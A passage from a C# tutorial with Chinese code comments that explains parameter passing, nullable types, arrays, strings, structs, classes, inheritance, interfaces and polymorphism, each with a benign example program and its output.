    temp = x; /* 保存 x 的值 */
    x = y; /* 把 y 赋值给 x */
    y = temp; /* 把 temp 赋值给 y */
    }

    static void Main(string[] args)
    {
    NumberManipulator n = new NumberManipulator();
    /* 局部变量定义 */
    int a = 100;
    int b = 200;

    Console.WriteLine("在交换之前,a 的值: {0}", a);
    Console.WriteLine("在交换之前,b 的值: {0}", b);

    /* 调用函数来交换值 */
    n.swap(a, b);

    Console.WriteLine("在交换之后,a 的值: {0}", a);
    Console.WriteLine("在交换之后,b 的值: {0}", b);

    Console.ReadLine();
    }
    }
    }

​When the above code is compiled and executed, it produces the following result:

    在交换之前,a 的值: 100
    在交换之前,b 的值: 200
    在交换之后,a 的值: 100
    在交换之后,b 的值: 200

​a and b were not swapped.

Passing Parameters by Reference

​A reference parameter is a reference to a variable's memory location. Unlike value parameters, passing by reference does not create a new storage location for the parameter; the reference parameter denotes the same memory location as the actual argument supplied to the method.

​Similar in spirit to C/C++ pointers.

​In C#, reference parameters are declared with the ref keyword. The following example demonstrates this:

    using System;
    namespace CalculatorApplication
    {
    class NumberManipulator
    {
    public void swap(ref int x, ref int y)
    {
    int temp;

    temp = x; /* 保存 x 的值 */
    x = y; /* 把 y 赋值给 x */
    y = temp; /* 把 temp 赋值给 y */
    }

    static void Main(string[] args)
    {
    NumberManipulator n = new NumberManipulator();
    /* 局部变量定义 */
    int a = 100;
    int b = 200;

    Console.WriteLine("在交换之前,a 的值: {0}", a);
    Console.WriteLine("在交换之前,b 的值: {0}", b);

    /* 调用函数来交换值 */
    n.swap(ref a, ref b);

    Console.WriteLine("在交换之后,a 的值: {0}", a);
    Console.WriteLine("在交换之后,b 的值: {0}", b);

    Console.ReadLine();

    }
    }
    }
    在交换之前,a 的值:100
    在交换之前,b 的值:200
    在交换之后,a 的值:200
    在交换之后,b 的值:100

Passing Parameters by Output

​A return statement can return only one value from a function. Output parameters let you return multiple values: an output parameter has the method's output assigned to it, and in other respects it behaves like a reference parameter.

    using System;

    namespace CalculatorApplication
    {
    class NumberManipulator
    {
    public void getValue(out int x)
    {
    int temp = 5;
    x = temp;
    }

    static void Main(string[] args)
    {
    NumberManipulator n = new NumberManipulator();
    /* 局部变量定义 */
    int a = 100;

    Console.WriteLine("在方法调用之前,a 的值: {0}", a);

    /* 调用函数来获取值 */
    n.getValue(out a);

    Console.WriteLine("在方法调用之后,a 的值: {0}", a);
    Console.ReadLine();

    }
    }
    }
    在方法调用之前,a 的值: 100
    在方法调用之后,a 的值: 5

C# Nullable Types

Nullable Types in C# (Nullable)

The single question mark ? allows null to be assigned to data types such as int, double and bool that cannot normally hold null; it marks the type as Nullable.

    using System;
    namespace CalculatorApplication
    {
    class NullablesAtShow
    {
    static void Main(string[] args)
    {
    int? num1 = null;
    int? num2 = 45;
    double? num3 = new double?();
    double? num4 = 3.14157;

    bool? boolval = new bool?();

    // 显示值

    Console.WriteLine("显示可空类型的值: {0}, {1}, {2}, {3}",
    num1, num2, num3, num4);
    Console.WriteLine("一个可空的布尔值: {0}", boolval);
    Console.ReadLine();

    }
    }
    }
    显示可空类型的值: , 45, , 3.14157
    一个可空的布尔值:

The Null Coalescing Operator (??)

​The null coalescing operator supplies defaults for nullable value types and reference types: it defines a preset value to fall back on in case the nullable value is null.

    using System;
    namespace CalculatorApplication
    {
    class NullablesAtShow
    {

    static void Main(string[] args)
    {

    double? num1 = null;
    double? num2 = 3.14157;
    double num3;
    num3 = num1 ?? 5.34; // num1 如果为空值则返回 5.34
    Console.WriteLine("num3 的值: {0}", num3);
    num3 = num2 ?? 5.34;
    Console.WriteLine("num3 的值: {0}", num3);
    Console.ReadLine();

    }
    }
    }
    num3 的值: 5.34
    num3 的值: 3.14157

?? can be understood as a shorthand for the conditional operator:

    num3 = num1 ?? 5.34;
num3 = (num1 == null) ? 5.34 : num1.Value; // what ?? expands to, conceptually

C# Arrays

    using System;
    namespace ArrayApplication
    {
    class MyArray
    {
    static void Main(string[] args)
    {
    int[] n = new int[10]; /* n 是一个带有 10 个整数的数组 */
    int i, j;


    /* 初始化数组 n 中的元素 */
    for (i = 0; i < 10; i++)
    {
    n[i] = i + 100;
    }

    /* 输出每个数组元素的值 */
    for (j = 0; j < 10; j++)
    {
    Console.WriteLine("Element[{0}] = {1}", j, n[j]);
    }
    Console.ReadKey();
    }
    }
    }

​A two-dimensional array:

    using System;

    namespace TwoDimensionalArrayExample
    {
    class Program
    {
    static void Main(string[] args)
    {
    // 定义一个3行4列的二维数组
    int[,] array = new int[3, 4];

    // 使用嵌套循环来初始化数组元素
    for (int i = 0; i < 3; i++)
    {
    for (int j = 0; j < 4; j++)
    {
    array[i, j] = i * j; // 举例:初始化为行索引乘以列索引
    }
    }

    /* 也可直接初始化:
    int[,] array =
    {
    { 1, 2, 3, 4 },
    { 5, 6, 7, 8 },
    { 9, 10, 11, 12 }
    };
    */

    // 打印数组元素
    for (int i = 0; i < 3; i++)
    {
    for (int j = 0; j < 4; j++)
    {
    Console.Write(array[i, j] + "\t");
    }
    Console.WriteLine();
    }
    }
    }
    }

C# Multidimensional Arrays

​The two-dimensional array in C# is a different concept from the two-dimensional arrays of languages such as C/C++ and Java; a C# 2-D array is more like a matrix:

int [,] a = new int [3,4] {
{0, 1, 2, 3} ,  /* initializers for the row with index 0 */
{4, 5, 6, 7} ,  /* initializers for the row with index 1 */
{8, 9, 10, 11}  /* initializers for the row with index 2 */
};

​Coming to C# from another language, it is easy to confuse this with the concept of a jagged array.

C# Jagged Arrays

​In C#, multidimensional arrays and jagged arrays are two different kinds of array, with several important differences:

1. Memory layout
  • Multidimensional arrays are stored contiguously in memory. For example, int[,] arr = new int[3, 4]; allocates one contiguous block holding 3 * 4 = 12 integers.
  • A jagged array is really an array of arrays: each element is an independent one-dimensional array. The sub-arrays are not necessarily contiguous in memory, and each may have a different length. For example, with int[][] jaggedArray = new int[3][]; each element of jaggedArray is an int[], and each int[] may have its own length.
2. Flexibility
  • Multidimensional arrays fix the size of every dimension at declaration. With int[,] arr = new int[3, 4]; arr has three rows and four columns, and the number of rows or columns cannot change dynamically.
  • In a jagged array, each sub-array's length can be set independently after declaration, so sub-arrays may differ in size. This makes jagged arrays more flexible and convenient for irregular data structures.
3. Access syntax
  • Multidimensional arrays separate the index of each dimension with a comma. For example, int x = arr[1, 2]; reads the element in the second row, third column.
  • Jagged arrays use the first index to select a sub-array and the second to select an element within it. For example, int y = jaggedArray[1][2]; reads the third element of the second sub-array.
4. Use cases and performance
  • Multidimensional arrays suit matrices and similar two-dimensional data, since they offer fast access and a contiguous memory layout that helps performance.
  • Jagged arrays suit irregular or dynamically sized data sets, since each sub-array can be resized as needed.

​In short, multidimensional and jagged arrays differ clearly in memory layout, flexibility, and access syntax; which to choose depends on the application and the shape of the data.

• A jagged array is an array of arrays

• A jagged array is a one-dimensional array

​You can declare a jagged array of int values named scores like this:

    int [][] scores;

​Declaring an array does not create it in memory. To create the array above:

    int[][] scores = new int[5][];
    for (int i = 0; i < scores.Length; i++)
    {
    scores[i] = new int[4];
    }

​You can also initialize a jagged array directly:

    int[][] scores = new int[2][]{new int[]{92,93,94},new int[]{85,66,87,88}};

Passing Arrays to Functions in C#

​In C#, you can pass an array as a function argument by giving the array's name without an index; this passes a reference to the array.

​The following example demonstrates passing an array to a function:

    using System;

    namespace ArrayApplication
    {
    class MyArray
    {
    double getAverage(int[] arr, int size)
    {
    int i;
    double avg;
    int sum = 0;

    for (i = 0; i < size; ++i)
    {
    sum += arr[i];
    }

    avg = (double)sum / size;
    return avg;
    }
    static void Main(string[] args)
    {
    MyArray app = new MyArray();
    /* 一个带有 5 个元素的 int 数组 */
    int [] balance = new int[]{1000, 2, 3, 17, 50};
    double avg;

    /* 传递数组的指针作为参数 */
    avg = app.getAverage(balance, 5 ) ;

    /* 输出返回值 */
    Console.WriteLine( "平均值是: {0} ", avg );
    Console.ReadKey();
    }
    }
    }

C# Strings

Creating String Objects

​In C# you can represent a string as a character array, but the more common practice is to declare a string variable with the string keyword, which is an alias for the System.String class.

​You can create a string object in any of the following ways:

• by assigning a string literal to a String variable
• by using a String class constructor
• by using the string concatenation operator (+)
• by retrieving a property or calling a method that returns a string
• by calling a formatting method to convert a value or object to its string representation
    using System;

    namespace StringApplication
    {
    class Program
    {
    static void Main(string[] args)
    {
    // 字符串,字符串连接
    string fname, lname;
    fname = "Rowan";
    lname = "Atkinson";

    string fullname = fname + lname;
    Console.WriteLine("Full Name: {0}", fullname);

    // 通过使用 string 构造函数
    char[] letters = { 'H', 'e', 'l', 'l', 'o' };
    string greetings = new string(letters);
    Console.WriteLine("Greetings: {0}", greetings);

    // 方法返回字符串
    string[] sarray = { "Hello", "From", "Tutorials", "Point" };
    string message = String.Join(" ", sarray);
    Console.WriteLine("Message: {0}", message);

    // 用于转化值的格式化方法
    DateTime waiting = new DateTime(2012, 10, 10, 17, 58, 1);
    string chat = String.Format("Message sent at {0:t} on {0:D}",
    waiting);
    Console.WriteLine("Message: {0}", chat);
    Console.ReadKey();
    }
    }
    }
    Full Name: RowanAtkinson
    Greetings: Hello
    Message: Hello From Tutorials Point
    Message: Message sent at 17:58 on 2012年10月10日

Properties of the String Class

​Length: gets the number of characters in the current String object.

Methods of the String Class

Comparing Strings

    String.Compare()

    using System;

    namespace StringApplication
    {
    class StringProg
    {
    static void Main(string[] args)
    {
    string str1 = "This is test";
    string str2 = "This is test";

    if (String.Compare(str1, str2) == 0)
    {
    Console.WriteLine(str1 + " and " + str2 + " are equal.");
    }
    else
    {
    Console.WriteLine(str1 + " and " + str2 + " are not equal.");
    }

    Console.ReadKey();
    }
    }
    }
    This is test and This is test are equal.
Testing Whether a String Contains a Substring

    Contains()

    using System;

    namespace StringApplication
    {
    class StringProg
    {
    static void Main(string[] args)
    {
    string str = "This is test";
    if (str.Contains("test"))
    {
    Console.WriteLine("The sequence 'test' was found.");
    }
    Console.ReadKey();
    }
    }
    }
    The sequence 'test' was found.
Getting a Substring

    Substring()

    using System;
    namespace StringApplication
    {
    class StringProg
    {
    static void Main(string[] args)
    {
    string str = "01234567890123456789";
    Console.WriteLine(str);
    string substr = str.Substring(10);
    Console.WriteLine(substr);
    Console.ReadKey();
    }
    }
    }
    01234567890123456789
    0123456789
Joining Strings

    Join()

    using System;

    namespace StringApplication
    {
    class StringProg
    {
    static void Main(string[] args)
    {
    string[] starray = new string[]{"Down the way nights are dark",
    "And the sun shines daily on the mountain top",
    "I took a trip on a sailing ship",
    "And when I reached Jamaica",
    "I made a stop"};

    string str = String.Join("\n", starray);
    Console.WriteLine(str);
    Console.ReadKey() ;
    }
    }
    }
    Down the way nights are dark
    And the sun shines daily on the mountain top
    I took a trip on a sailing ship
    And when I reached Jamaica
    I made a stop

Formatting Dates with string.Format

    DateTime dt = new DateTime(2017, 4, 1, 13, 16, 32, 108);
    string.Format("{0:y yy yyy yyyy}",dt); // 17 17 2017 2017
    string.Format("{0:M MM MMM MMMM}", dt);// 4 04 四月 四月
    string.Format("{0:d dd ddd dddd}", dt);// 1 01 周六 星期六
    string.Format("{0:t tt}", dt);// 下 下午
    string.Format("{0:H HH}", dt);// 13 13
    string.Format("{0:h hh}", dt);// 1 01
    string.Format("{0:m mm}", dt);// 16 16
    string.Format("{0:s ss}", dt);// 32 32
    string.Format("{0:F FF FFF FFFF FFFFF FFFFFF FFFFFFF}", dt);// 1 1 108 108 108 108 108
    string.Format("{0:f ff fff ffff fffff ffffff fffffff}", dt);// 1 10 108 1080 10800 108000 1080000
    string.Format("{0:z zz zzz}", dt);// +8 +08 +08:00

    string.Format("{0:yyyy/MM/dd HH:mm:ss.fff}",dt);  // 2017/04/01 13:16:32.108
    string.Format("{0:yyyy/MM/dd dddd}", dt);      // 2017/04/01 星期六
    string.Format("{0:yyyy/MM/dd dddd tt hh:mm}", dt); // 2017/04/01 星期六 下午 01:16
    string.Format("{0:yyyyMMdd}", dt);         // 20170401
    string.Format("{0:yyyy-MM-dd HH:mm:ss.fff}", dt); // 2017-04-01 13:16:32.108

​Besides string.Format(), .ToString() can produce the same date formatting:

    DateTime dt = new DateTime(2017,4,1,13,16,32,108);
    dt.ToString("y yy yyy yyyy"); // 17 17 2017 2017
    dt.ToString("M MM MMM MMMM"); // 4 04 四月 四月
    dt.ToString("d dd ddd dddd"); // 1 01 周六 星期六
    dt.ToString("t tt"); // 下 下午
    dt.ToString("H HH"); // 13 13
    dt.ToString("h hh"); // 1 01
    dt.ToString("m mm"); // 16 16
    dt.ToString("s ss"); // 32 32
    dt.ToString("F FF FFF FFFF FFFFF FFFFFF FFFFFFF"); // 1 1 108 108 108 108 108
    dt.ToString("f ff fff ffff fffff ffffff fffffff"); // 1 10 108 1080 10800 108000 1080000
    dt.ToString("z zz zzz"); // +8 +08 +08:00

    dt.ToString("yyyy/MM/dd HH:mm:ss.fff"); // 2017/04/01 13:16:32.108
    dt.ToString("yyyy/MM/dd dddd"); // 2017/04/01 星期六
    dt.ToString("yyyy/MM/dd dddd tt hh:mm"); // 2017/04/01 星期六 下午 01:16
    dt.ToString("yyyyMMdd"); // 20170401
    dt.ToString("yyyy-MM-dd HH:mm:ss.fff");  // 2017-04-01 13:16:32.108

C# Structs

​In C#, a struct is a value type used to organize and store related data.

​A struct is a value-type data structure that lets a single variable hold related data of various types.

    using System;
    using System.Text;

    struct Books
    {
    public string title;
    public string author;
    public string subject;
    public int book_id;
    };

    public class testStructure
    {
    public static void Main(string[] args)
    {
    /* 声明 Book1,类型为 Books */
    Books Book1;
    /* 声明 Book2,类型为 Books */
    Books Book2;

    /* book 1 详述 */
    Book1.title = "C Programming";
    Book1.author = "Nuha Ali";
    Book1.subject = "C Programming Tutorial";
    Book1.book_id = 6495407;

    /* book 2 详述 */
    Book2.title = "Telecom Billing";
    Book2.author = "Zara Ali";
    Book2.subject = "Telecom Billing Tutorial";
    Book2.book_id = 6495700;

    /* 打印 Book1 信息 */
    Console.WriteLine("Book 1 title : {0}", Book1.title);
    Console.WriteLine("Book 1 author : {0}", Book1.author);
    Console.WriteLine("Book 1 subject : {0}", Book1.subject);
    Console.WriteLine("Book 1 book_id :{0}", Book1.book_id);

    /* 打印 Book2 信息 */
    Console.WriteLine("Book 2 title : {0}", Book2.title);
    Console.WriteLine("Book 2 author : {0}", Book2.author);
    Console.WriteLine("Book 2 subject : {0}", Book2.subject);
    Console.WriteLine("Book 2 book_id : {0}", Book2.book_id);

    Console.ReadKey();

    }
    }
    Book 1 title : C Programming
    Book 1 author : Nuha Ali
    Book 1 subject : C Programming Tutorial
    Book 1 book_id : 6495407
    Book 2 title : Telecom Billing
    Book 2 author : Zara Ali
    Book 2 subject : Telecom Billing Tutorial
    Book 2 book_id : 6495700

Classes vs Structs

​Classes and structs involve different design considerations: classes suit complex objects and behavior, with support for inheritance and polymorphism, while structs suit lightweight data and value semantics, improving performance and avoiding the overhead of managing references.

​Classes and structs differ in these basic ways:

Value type vs reference type:

• A struct is a value type: structs are allocated on the stack rather than the heap (when they are local variables), and passing a struct instance to a method or assigning it to another variable copies the struct's entire contents.
• A class is a reference type: class instances are allocated on the heap, and passing an instance to a method or assigning it to another variable passes the reference (memory address), not a copy of the whole object.

Inheritance and polymorphism:

• Structs cannot inherit: a struct cannot inherit from another struct or class, nor act as the base of one.
• Classes support inheritance: classes support inheritance and polymorphism, and new classes can be derived to extend existing ones.

Default constructors:

• A struct cannot declare a parameterless constructor (before C# 10); any constructor a struct declares must take parameters.
• A class may declare a parameterless constructor; if no constructor is provided, the compiler supplies a default parameterless one.

Assignment behavior:

• Assigning a class-typed variable stores a reference, so both variables point to the same object.
• Assigning a struct copies the whole struct, so each variable holds its own independent copy.

Passing behavior:

• Class-typed objects are passed by reference in method calls, so changes made to the object inside the method affect the original object.
• Structs are normally passed by value: a copy of the struct is passed rather than the original, so changes made inside the method do not affect the original.

Nullability:

• A struct is a value type and cannot be set to null directly: null is the default value for reference types, not value types. To represent a missing or invalid struct value, use Nullable<T>, also written T?.
• A class instance can be null by default, since classes are reference types.

Performance and memory allocation:

• Structs are usually lighter: as stack-allocated value types they are typically lighter-weight than classes and suited to simple data.
• Classes can carry more overhead: as reference types they may involve more memory overhead and management.

​In the example below, MyStruct is a struct and MyClass is a class.

​The commented-out parts show that a struct cannot declare a parameterless constructor and cannot inherit, and that copying a struct instance copies its entire contents. By contrast, a class may declare a parameterless constructor, may inherit, and copying an instance copies only the reference.

​(Classes here behave a bit like Python objects: if you want modifying one instance not to affect another, as with structs, you must provide something like a .copy() method in the class yourself.)

    using System;

    // 结构声明
    struct MyStruct
    {
    public int X;
    public int Y;

    // 结构不能有无参数的构造函数
    // public MyStruct()
    // {
    // }

    // 有参数的构造函数
    // CS0171必须先完全分配字段 'MyStruct.Y' ,然后才能将控件返回给调用方。请考虑更新到语言版本 '11.0' 以自动默认字段
    public MyStruct(int x, int y)
    {
    X = x;
    Y = y;
    }

    // 结构不能继承
    // struct MyDerivedStruct : MyBaseStruct
    // {
    // }
    }

    // 类声明
    class MyClass
    {
    public int X;
    public int Y;

    // 类可以有无参数的构造函数
    public MyClass()
    {
    }

    // 有参数的构造函数
    public MyClass(int x, int y)
    {
    X = x;
    Y = y;
    }

    // 类支持继承
    // class MyDerivedClass : MyBaseClass
    // {
    // }

    public MyClass ShallowCopy()
    {
    return (MyClass)this.MemberwiseClone();
    }
    }

    class Program
    {
    static void Main()
    {
    // 结构是值类型,分配在栈上
    MyStruct structInstance1 = new MyStruct(1, 2);
    MyStruct structInstance2 = structInstance1; // 复制整个结构

    // 类是引用类型,分配在堆上
    MyClass classInstance1 = new MyClass(3, 4);
    MyClass classInstance2 = classInstance1; // 复制引用,指向同一个对象
    MyClass classInstance3 = classInstance1.ShallowCopy(); // 浅拷贝,指向不同对象

    // 修改结构实例不影响其他实例
    structInstance1.X = 5;
    Console.WriteLine($"Struct: {structInstance1.X}, {structInstance2.X}");

    // 修改类实例会影响其他实例
    classInstance1.X = 6;
    Console.WriteLine($"Class: {classInstance1.X}, {classInstance2.X}, {classInstance3.X}");
    }
    }
    Struct: 5, 1
    Class: 6, 6, 3

C# Enums

​Each symbol in an enum list stands for an integer value, one greater than the symbol that precedes it. By default the first enum symbol has the value 0, but you can also set the values yourself.

    using System;

    public class EnumTest
    {
    enum Day { Sun = 1, Mon = 3, Tue, Wed, Thu, Fri = 9, Sat };

    static void Main()
    {
    Console.WriteLine("Sun = {0}, Mon = {1}, Tue = {2}, Wed = {3}, Thu = {4}, Fri = {5}, Sat = {6}", (int)Day.Sun, (int)Day.Mon, (int)Day.Tue, (int)Day.Wed, (int)Day.Thu, (int)Day.Fri, (int)Day.Sat);
    }
    }
    Sun = 1, Mon = 3, Tue = 4, Wed = 5, Thu = 6, Fri = 9, Sat = 10

C# Classes

Defining a Class

​A class definition starts with the keyword class followed by the class name; the class body is enclosed in a pair of braces. The general form of a class definition is:

    <access specifier> class  class_name 
    {
    // member variables
    <access specifier> <data type> variable1;
    <access specifier> <data type> variable2;
    ...
    <access specifier> <data type> variableN;
    // member methods
    <access specifier> <return type> method1(parameter_list)
    {
    // method body
    }
    <access specifier> <return type> method2(parameter_list)
    {
    // method body
    }
    ...
    <access specifier> <return type> methodN(parameter_list)
    {
    // method body
    }
    }
• The access specifier <access specifier> determines the access rules for the class and its members. If none is given, the defaults apply: internal for the class, private for its members.
• The data type <data type> specifies a variable's type, and the return type <return type> specifies the data type the method returns.
• To access a class member, use the dot (.) operator.
• The dot operator links the name of an object to the name of a member.

Member Functions and Encapsulation

​A member function of a class is a function whose definition or prototype appears within the class definition, like any other member. It can operate on any object of its class and can access all of the class's members for that object.

​Member variables are the attributes of an object (from a design perspective), and they are kept private to implement encapsulation; they can then be accessed only through public member functions.

​Let's use these concepts to set and get the values of different class members:

    using System;
    namespace BoxApplication
    {
    class Box
    {
    private double length; // 长度
    private double breadth; // 宽度
    private double height; // 高度
    public void setLength(double len)
    {
    length = len;
    }

    public void setBreadth(double bre)
    {
    breadth = bre;
    }

    public void setHeight(double hei)
    {
    height = hei;
    }
    public double getVolume()
    {
    return length * breadth * height;
    }
    }
    class Boxtester
    {
    static void Main(string[] args)
    {
    Box Box1 = new Box(); // 声明 Box1,类型为 Box
    Box Box2 = new Box(); // 声明 Box2,类型为 Box
    double volume; // 体积


    // Box1 详述
    Box1.setLength(6.0);
    Box1.setBreadth(7.0);
    Box1.setHeight(5.0);

    // Box2 详述
    Box2.setLength(12.0);
    Box2.setBreadth(13.0);
    Box2.setHeight(10.0);

    // Box1 的体积
    volume = Box1.getVolume();
    Console.WriteLine("Box1 的体积: {0}", volume);

    // Box2 的体积
    volume = Box2.getVolume();
    Console.WriteLine("Box2 的体积: {0}", volume);

    Console.ReadKey();
    }
    }
    }
    Box1 的体积: 210
    Box2 的体积: 1560

Constructors in C#

​A class's constructor is a special member function of the class that executes whenever a new object of the class is created.

​A constructor has exactly the same name as the class and has no return type.

A default constructor takes no parameters. If you need one, a constructor can also take parameters; such a constructor is called a parameterized constructor. (Just as in C++/JavaScript.)

Destructors in C#

​A class's destructor is a special member function of the class that executes when an object of the class goes out of scope (when it is no longer needed and is destroyed).

​A destructor's name is the class name prefixed with a tilde (~); it returns no value and takes no parameters.

​Destructors release resources before the program ends (closing files, freeing memory, and so on). Destructors cannot be inherited or overloaded.

Static Members of a C# Class

​We can define class members as static with the static keyword. Declaring a member static means that no matter how many objects of the class are created, there is only one copy of that static member.

​The keyword static means there is a single instance of the member for the class. Static variables are useful for defining constants, because their values can be retrieved by referring to the class directly, without creating an instance. Static variables can be initialized outside member functions or the class definition, and also inside the class definition.

​You can also declare a member function static. Such a function can access only static variables, and it exists even before any object is created. The following example demonstrates static functions:

    using System;
    namespace StaticVarApplication
    {
    class StaticVar
    {
    public static int num;
    public void count()
    {
    num++;
    }
    public static int getNum()
    {
    return num;
    }
    }
    class StaticTester
    {
    static void Main(string[] args)
    {
    StaticVar s = new StaticVar();
    s.count();
    s.count();
    s.count();
    Console.WriteLine("变量 num: {0}", StaticVar.getNum());
    Console.ReadKey();
    }
    }
    }
    变量 num: 3

C# Inheritance

​Inheritance is one of the most important concepts in object-oriented programming. It lets us define one class in terms of another, which makes creating and maintaining an application easier, encourages code reuse, and saves development time.

​When creating a class, instead of writing completely new data members and member functions, the programmer can design a new class that inherits the members of an existing class. The existing class is called the base class, and the new class is called the derived class.

​Inheritance embodies the IS-A relationship. For example, a mammal IS-A animal, a dog IS-A mammal, hence a dog IS-A animal.

Base and Derived Classes

​A class can inherit from another class; the two are called the base class (parent) and the derived class (child).

​C# does not support multiple inheritance of classes, but it does support multiple inheritance of interfaces: one class may implement several interfaces.

​In short: a class may implement multiple interfaces, but it can inherit from only one class.

​The syntax for creating a derived class in C# is:

<access modifier> class <base class>
{
...
}
class <derived class> : <base class>
{
...
}

​A derived class inherits the base class's members (fields, methods, properties, and so on); members marked private remain inaccessible to the derived class.

A derived class can call the base class's constructors and methods through the keyword base.

Initializing the Base Class

    using System;
    namespace RectangleApplication
    {
    class Rectangle
    {
    // 成员变量
    protected double length;
    protected double width;
    public Rectangle(double l, double w)
    {
    length = l;
    width = w;
    }
    public double GetArea()
    {
    return length * width;
    }
    public void Display()
    {
    Console.WriteLine("长度: {0}", length);
    Console.WriteLine("宽度: {0}", width);
    Console.WriteLine("面积: {0}", GetArea());
    }
    }//end class Rectangle
    class Tabletop : Rectangle
    {
    private double cost;
    public Tabletop(double l, double w) : base(l, w)
    { }
    public double GetCost()
    {
    double cost;
    cost = GetArea() * 70;
    return cost;
    }
    public void Display()
    {
    base.Display();
    Console.WriteLine("成本: {0}", GetCost());
    }
    }
    class ExecuteRectangle
    {
    static void Main(string[] args)
    {
    Tabletop t = new Tabletop(4.5, 7.5);
    t.Display();
    Console.ReadLine();
    }
    }
    }
    长度: 4.5
    宽度: 7.5
    面积: 33.75
    成本: 2362.5

The Display() defined by Tabletop hides the Display() defined by Rectangle; without the base.Display(); statement, Rectangle.Display() would never run.

Interface Inheritance

​An interface may inherit from one or more other interfaces, and the derived interface inherits all the members of its base interfaces.

​A derived interface can extend the base interface's member list, but it cannot change the members' access modifiers.

    using System;

    // 定义一个基接口
    interface IBaseInterface
    {
    void Method1();
    }

    // 定义一个派生接口,继承自基接口
    interface IDerivedInterface : IBaseInterface
    {
    void Method2();
    }

    // 实现派生接口的类
    class MyClass : IDerivedInterface
    {
    public void Method1()
    {
    Console.WriteLine("Method1 implementation");
    }

    public void Method2()
    {
    Console.WriteLine("Method2 implementation");
    }
    }

    class Program
    {
    static void Main(string[] args)
    {
    // 创建 MyClass 类的实例
    MyClass obj = new MyClass();

    // 调用继承自基接口的方法
    obj.Method1();

    // 调用派生接口新增的方法
    obj.Method2();
    }
    }

​Interfaces and classes have clearly different roles and uses in object-oriented programming:

1. Definition and purpose
  • A class is a concrete data structure that encapsulates data and behavior (methods). A class can be instantiated into objects, which carry the properties and methods the class defines.
  • An interface is an abstract type that defines a set of methods (and constants) without any implementing code. An interface defines a protocol or contract, stating which methods an implementing class must provide.
2. Implementation
  • A class may contain fields, properties, methods, constructors, and other implementation code; it supplies concrete data and behavior.
  • An interface may only declare the signatures of methods, properties, events and indexers, with no implementation. A class that implements the interface must provide concrete implementations of all of its members.
3. Inheritance
  • A class can inherit from another class, forming a class hierarchy. It inherits the parent's fields and methods, and may override the parent's methods or add new ones.
  • An interface can be implemented by classes, and one class may implement several interfaces. Interfaces also support multiple inheritance among themselves: one interface may inherit several others.
4. Use cases
  • Classes suit describing concrete objects and implementing complex behavior; they can hold state (fields) as well as behavior (methods).
  • Interfaces suit defining what an object should be able to do, without caring about the implementation details. Interfaces establish contracts between classes, making code more modular and extensible.

​To summarize: a class is a concrete implementation of data and behavior, whereas an interface is an abstract description of capability. Using classes and interfaces judiciously makes code more flexible, maintainable, and extensible.


C# Multiple Inheritance

​On multiple inheritance in C++, see: C++(23)——理解多重继承(菱形继承、半圆形继承)、虚基类和虚继承_c++23-CSDN博客 (CSDN blog, in Chinese).

​Multiple inheritance means a class can inherit behavior and features from more than one parent class at the same time, in contrast with single inheritance, where a class inherits from only one parent.

C# does not support multiple inheritance of classes. However, you can use interfaces to achieve the same effect (a class cannot inherit from multiple base classes, but it can implement multiple interfaces). The following program demonstrates this:

    using System;
    namespace InheritanceApplication
    {
    class Shape
    {
    public void setWidth(int w)
    {
    width = w;
    }
    public void setHeight(int h)
    {
    height = h;
    }
    protected int width;
    protected int height;
    }

// interface PaintCost
    public interface PaintCost
    {
    int getPaintCost(int area);

    }

// interface FlatCost
    public interface FlatCost
    {
    int getFlatCost(int area);

    }
    // 派生类
    class Rectangle : Shape, PaintCost, FlatCost
    {
    public int getArea()
    {
    return (width * height);
    }
    public int getPaintCost(int area)
    {
    return area * 70;
    }
    public int getFlatCost(int area)
    {
    return area * 20;
    }
    }
    class RectangleTester
    {
    static void Main(string[] args)
    {
    Rectangle Rect = new Rectangle();
    int area;
    Rect.setWidth(5);
    Rect.setHeight(7);
    area = Rect.getArea();
    // 打印对象的面积
    Console.WriteLine("总面积: {0}", Rect.getArea());
    Console.WriteLine("油漆总成本: ${0}", Rect.getPaintCost(area));
    Console.WriteLine("工本费: ${0}", Rect.getFlatCost(area));
    Console.ReadKey();
    }
    }
    }
    总面积: 35
    油漆总成本: $2450
    工本费: $700

C# Polymorphism

Polymorphism is the ability of one behavior to take several different forms.

Polymorphism means "many forms". In the object-oriented paradigm it is often summarized as "one interface, multiple implementations".

​Polymorphism can be static or dynamic. With static polymorphism the response to a call is determined at compile time; with dynamic polymorphism it is determined at run time.

​In C#, every type is polymorphic, because all types, including user-defined types, inherit from Object.

​A real-world example is pressing the F1 key:

• in the Flash interface it brings up the ActionScript 3 documentation;

• in Word it brings up Word Help;

• on the Windows desktop it brings up Windows Help and Support.

  The same event, occurring on different objects, produces different results. (That is polymorphism!)

Static Polymorphism

Linking a function to an object at compile time is called early binding, or static binding. C# provides two techniques for static polymorphism:

• function overloading
• operator overloading

Function Overloading

​You can have multiple definitions for the same function name within one scope. The definitions must differ from one another, either in the types or in the number of their parameters (in short, in the parameter list). You cannot overload function declarations that differ only in their return type.

    using System;
    namespace PolymorphismApplication
    {
    public class TestData
    {
    public int Add(int a, int b, int c)
    {
    return a + b + c;
    }
    public int Add(int a, int b)
    {
    return a + b;
    }
    }
    class Program
    {
    static void Main(string[] args)
    {
    TestData dataClass = new TestData();
    int add1 = dataClass.Add(1, 2);
    int add2 = dataClass.Add(1, 2, 3);

    Console.WriteLine("add1 :" + add1);
    Console.WriteLine("add2 :" + add2);
    }
    }
    }

Dynamic Polymorphism

​Static polymorphism and dynamic polymorphism are the two ways object-oriented programming realizes polymorphism; the main difference between them is how the specific method to call is determined.

1. Static polymorphism (compile-time polymorphism)
  • The method call is resolved at compile time, using compile-time type information to decide which method to invoke.
  • Its main forms are function overloading and operator overloading. With function overloading, the compiler picks the correct overload from the types or number of arguments at the call site.
  • Its advantage is efficiency: the method is fixed at compile time, so no extra lookup or dispatch is needed at run time.
2. Dynamic polymorphism (run-time polymorphism)
  • The method call is resolved at run time according to the object's actual type.
  • Its main forms are inheritance with method overriding, together with interfaces and virtual methods. Through inheritance a subclass can override a parent method, and at run time the correct version is invoked based on the object's actual type.
  • Its advantage is flexibility and extensibility: deciding the call at run time supports more complex and dynamic program logic.

​C# lets you create abstract classes with the keyword abstract; an abstract class provides a partial implementation of an interface, which is completed when a derived class inherits from it. Abstract classes contain abstract methods, which derived classes implement, giving the derived class more specialized functionality.

​Note the following rules about abstract classes:

• You cannot create an instance of an abstract class.
• You cannot declare an abstract method outside an abstract class.
• Placing the keyword sealed before a class definition declares the class sealed; a sealed class cannot be inherited. An abstract class cannot be declared sealed.

